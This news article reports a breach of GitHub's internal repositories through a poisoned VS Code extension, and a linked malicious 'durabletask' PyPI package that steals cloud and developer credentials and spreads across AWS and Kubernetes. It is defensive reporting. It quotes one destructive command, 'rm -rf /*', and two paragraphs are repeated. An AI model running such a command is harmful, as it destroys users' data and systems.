GitHub has confirmed that it is investigating unauthorized access to some of its internal repositories. The company shared the update through its official X account and said it is closely monitoring the situation.
In its statement, GitHub said there is currently no evidence that customer information stored outside of GitHub’s internal repositories has been affected. This includes enterprise accounts, organizations, and user repositories.
The incident became public after TeamPCP reportedly listed GitHub source code and internal organizational data for sale on a cybercrime forum. According to screenshots shared online, the group claimed to have stolen around 4,000 repositories and was asking for at least $50,000 for the data.
TeamPCP also posted on X claiming how GitHub knew about the incident for hours but delayed admitting it.
GitHub later confirmed that the attackers’ claims about the number of repositories are “directionally consistent” with its own investigation so far.
GitHub revealed the initial entry point of the attack. According to the company, the compromise started from an employee’s device infected through a poisoned Microsoft Visual Studio Code extension.
This information is important because VS Code extensions often run with broad access to development environments. A malicious extension can potentially access authentication tokens, local repositories, developer secrets, and cloud credentials stored on a machine.
GitHub says it quickly detected and contained the compromise and has already rotated critical secrets to reduce further risk.
VS Code extensions often run with broad access to development environments. A malicious extension can potentially access authentication tokens, local repositories, developer secrets, and cloud credentials stored on a machine.
GitHub says it quickly detected and contained the compromise and has already rotated critical secrets to reduce further risk.
At this point, the company believes only GitHub-internal repositories were accessed. But security researchers are paying close attention because internal repositories can contain deployment scripts, CI/CD configurations, infrastructure tooling, and security-related code that attackers may later abuse in broader supply chain attacks.
The incident also appears connected to TeamPCP’s ongoing campaign targeting open-source ecosystems through malicious packages.
Around the same time, researchers discovered compromised versions of Microsoft’s official “durabletask” Python package on PyPI. The malicious versions include 1.4.1, 1.4.2, and 1.4.3.
Wiz said the attacker first compromised a GitHub account through an earlier attack and then extracted GitHub secrets from a repository the victim had access to. Those secrets eventually exposed the PyPI publishing token used to upload malicious versions of the package.
The infected package reportedly downloaded a second-stage payload called “rope.pyz” from attacker-controlled infrastructure as soon as the package was imported into a project.
Researchers say the malware specifically targeted Linux systems commonly used in cloud servers, developer pipelines, and production environments.
SafeDep analyzed the payload and said the malware was designed to steal credentials linked to major cloud providers, password managers, developer tools, SSH keys, Docker credentials, VPN configurations, and shell history.
The company also said the malware attempted to access secrets stored in HashiCorp Vault and unlock password managers like 1Password and Bitwarden.
What makes the malware more dangerous is its ability to spread automatically inside cloud infrastructure.
Aikido Security said the malware could propagate itself across AWS EC2 environments using AWS Systems Manager. In Kubernetes environments, the malware reportedly spread using kubectl commands to execute payloads on connected containers and nodes.
This means a single infected machine inside a company’s cloud environment could potentially lead to lateral movement across multiple systems.
Aikido Security also uncovered another disturbing behavior. If the malware detected Israeli or Iranian regional settings, there was reportedly a one-in-six chance it would execute a destructive “rm -rf /*” command capable of wiping Linux systems.
StepSecurity later shared additional details about the worm-like propagation mechanism. According to the company, the malware used AWS Systems Manager’s SendCommand feature to spread itself to as many as five additional EC2 instances per AWS profile.
StepSecurity also said the malware included a backup communication mechanism called FIRESCALE. Instead of relying on a single command-and-control server, the malware searched public GitHub commit messages for encoded backup server information. This technique makes takedown efforts more difficult because attackers can dynamically switch infrastructure without directly embedding new servers into the malware.
Researchers believe the campaign may continue expanding because the malware spreads using stolen developer tokens and cloud credentials collected from infected environments.
Peyton Kennedy from Endor Labs warned that the malicious package executes silently the moment it is imported, without showing visible signs of compromise.
The researcher also noted that the durabletask package receives roughly 417,000 downloads every month, raising concerns that many development pipelines may already have been exposed before the malicious versions were discovered and removed.
Security experts are now advising organizations to immediately treat systems running the affected package versions as fully compromised. Developers are also being urged to rotate credentials, review CI/CD secrets, audit cloud access logs, and check for unauthorized AWS Systems Manager activity.
